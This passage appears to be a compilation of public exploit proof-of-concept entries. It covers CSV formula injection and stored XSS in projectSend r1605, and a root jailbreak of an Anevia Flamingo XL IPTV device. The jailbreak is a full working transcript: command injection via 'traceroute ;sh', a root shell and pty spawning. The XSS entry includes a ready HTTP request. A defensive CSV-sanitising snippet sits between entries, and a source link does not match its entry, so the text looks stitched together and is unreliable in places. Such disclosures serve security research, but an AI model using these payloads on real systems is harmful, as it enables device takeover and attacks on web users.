------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md
-
projectSend r1605 - CSV injection
Exploit Title: projectSend r1605 - CSV injection
Version: r1605
Bugs: CSV Injection
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Windows

2. Technical Details & POC
========================================
Step 1. Login as user
Step 2. Go to My Account ( http://localhost/users-edit.php?id=2 )
Step 3. Set name as =calc|a!z|
Step 4. If the admin exports the action log as a CSV file ( http://localhost/actions-log.php ), CSV injection occurs on the admin's computer and the calculator will open

payload: =calc|a!z|
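The export above is dangerous because a user-controlled name that starts with = is written into the CSV unchanged, and the admin's spreadsheet then evaluates it as a formula. The following is an added defensive example, not projectSend's code, of neutralising formula triggers on the way out; the column names are assumptions.

```python
# Added defensive example (not projectSend's code): neutralise spreadsheet formula
# triggers when user-controlled fields are written to an exported CSV.
# The column names in export_action_log are assumptions.
import csv
import io

# Leading characters that make Excel/LibreOffice evaluate a cell as a formula
# (the OWASP CSV-injection list: =, +, -, @, tab and carriage return).
_FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_csv_cell(value):
    """Prefix a formula-looking cell with an apostrophe so the spreadsheet shows it
    as text. Leading spaces are looked past because spreadsheets ignore them.
    Negative numbers in free-text columns are prefixed too; that is intended."""
    text = "" if value is None else str(value)
    if text.lstrip(" ").startswith(_FORMULA_TRIGGERS):
        return "'" + text
    return text


def export_action_log(rows, fields=("timestamp", "user_name", "action")):
    """Return the CSV text for the given log rows (dicts keyed by field name).

    Every cell passes through neutralize_csv_cell, and the csv module quotes
    every field (QUOTE_ALL), so embedded commas, quotes and newlines cannot spill
    a value into neighbouring cells or rows.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    writer.writerow(fields)
    for row in rows:
        writer.writerow([neutralize_csv_cell(row.get(field)) for field in fields])
    return buf.getvalue()


def parse_exported_log(text):
    """Read an export back into dicts; used to confirm the round trip."""
    return list(csv.DictReader(io.StringIO(text)))
```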
-
Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
                  Hardware revision 1.0
                  SoapLive 2.0.3

Summary: Flamingo XL, a new modular and high-density IPTV head-end product for hospitality and corporate markets. Flamingo XL captures live TV and radio content from satellite, cable, digital terrestrial and analog sources before streaming it over IP networks to STBs, PCs or other IP-connected devices. The Flamingo XL is based upon a modular 4U rack hardware platform that allows hospitality and corporate video service providers to deliver a mix of channels from various sources over internal IP networks.

Desc: Once the admin establishes a secure shell session, she gets dropped into a sandboxed environment using the login binary that allows a specific set of commands. One of those commands that can be exploited to escape the jailed shell is traceroute. A remote attacker can break out of the restricted environment and have full root access to the device.

Tested on: GNU/Linux 3.1.4 (x86_64)
           Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8g DAV/2 PHP/5.3.6

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php

13.04.2023

--

$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.

Anevia Flamingo XL

root@192.168.1.1's password:

Primary-XL> help
available commands:
bonding config date dns enable ethconfig exit exp firewall help hostname http
igmpq imp ipconfig license log mail passwd persistent_logs ping reboot reset
route serial settings sslconfig tcpdump timezone traceroute upgrade uptime
version vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary

Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
        [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
        [-z pausemsecs] host [data size]

trace the route ip packets follow going to "host"

Options:
        -F      Set the don't fragment bit
        -I      Use ICMP ECHO instead of UDP datagrams
        -l      Display the ttl value of the returned packet
        -d      Set SO_DEBUG options to socket
        -n      Print hop addresses numerically rather than symbolically
        -r      Bypass the normal routing tables and send directly to a host
        -v      Verbose output
        -m max_ttl      Set the max time-to-live (max number of hops)
        -p port#        Set the base UDP port number used in probes
                        (default is 33434)
        -q nqueries     Set the number of probes per ``ttl'' to nqueries
                        (default is 3)
        -s src_addr     Use the following IP address as the source address
        -t tos          Set the type-of-service in probe packets to the following value
                        (default 0)
        -w wait         Set the time (in seconds) to wait for a response to a probe
                        (default 3 sec)
        -g              Specify a loose source route gateway (8 maximum)

uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x   19 root root  1024 Oct  3  2022 .
drwxr-xr-x   19 root root  1024 Oct  3  2022 ..
drwxr-xr-x    2 root root  1024 Oct 21  2013 bin
drwxrwxrwt    2 root root    40 Oct  3  2022 cores
drwxr-xr-x   13 root root 27648 May 22 00:53 dev
drwxr-xr-x    3 root root  1024 Oct 21  2013 emul
drwxr-xr-x   48 1000 1000  3072 Oct  3  2022 etc
drwxr-xr-x    3 root root  1024 Oct  3  2022 home
drwxr-xr-x   11 root root  3072 Oct 21  2013 lib
lrwxrwxrwx    1 root root    20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx    1 root root     3 Oct 21  2013 lib64 -> lib
drwx------    2 root root 12288 Oct 21  2013 lost+found
drwxr-xr-x    4 root root  1024 Oct 21  2013 mnt
drwxrwxrwt    2 root root    80 May 22 00:45 php_sessions
dr-xr-xr-x  177 root root     0 Oct  3  2022 proc
drwxr-xr-x    4 root root  1024 Oct 21  2013 root
drwxr-xr-x    2 root root  2048 Oct 21  2013 sbin
drwxr-xr-x   12 root root     0 Oct  3  2022 sys
drwxrwxrwt   26 root root  1140 May 22 01:06 tmp
drwxr-xr-x   10 1000 1000  1024 Oct 21  2013 usr
drwxr-xr-x   14 root root  1024 Oct 21  2013 var
ls /var/www/admin
_img                 configuration.php                 log_securemedia.php   stream_dump.php
_lang                cores_and_logs_management.php     login.php             stream_services
_lib                 dataminer_handshake.php           logout.php            streaming.php
_style               dvbt.php                          logs.php              support.php
about.php            dvbt_scan.php                     main.php              template
ajax                 export.php                        manager.php           time.php
alarm.php            fileprogress.php                  network.php           toto.ts
alarm_view.php       firewall.php                      pear                  upload_helper.php
authentication.php   get_config                        power.php             uptime.php
bridges.php          get_enquiry_pending.php           read_settings.php     usbloader.php
cam.php              get_upgrade_error.php             receive_helper.php    version.php
channel.php          heartbeat.php                     rescrambling          webradio.php
channel_xl_list.php  include                           rescrambling.php      webtv
check_state          input.php                         resilience            webtv.php
class                js                                resilience.php        xmltv.php
common               license.php                       restart_service.php
config_snmp.php      log.php                           set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21  2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding          firewall   mail             timezone
config           help       passwd           traceroute
date             hostname   persistent_logs  upgrade
dbg-serial       http       ping             uptime
dbg-set-oem      igmpq      route            version
dbg-updates-log  imp        serial           vlanconfig
dns              ipconfig   settings
ethconfig        license    sslconfig
exp              log        tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]
-
projectSend r1605 - Stored XSS
Exploit Title: projectSend r1605 - Stored XSS
Application: projectSend
Version: r1605
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://www.projectsend.org/
Software Link: https://www.projectsend.org/
Date found: 11-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================
1. Login as admin
2. Go to Custom Html/Css/Js (http://localhost/custom-assets.php)
3. Go to new JS (http://localhost/custom-assets-add.php?language=js)
4. Set content as alert("xss"); and set public
5. And Save
6. Go to http://localhost (logout)

payload: alert("xss")

POST /custom-assets-add.php HTTP/1.1
Host: localhost
Content-Length: 171
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/custom-assets-add.php?language=js
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: log_download_started=false; PHPSESSID=7j8g8u9t7khb259ci4fvareg2l
Connection: close

csrf_token=222b49c5c4a1755c451637f17ef3e7ea8bb5b6ee616293bd73d15d0e608d9dab&language=js&title=test&content=alert%28%22XSS%22%29%3B&enabled=on&location=public&position=head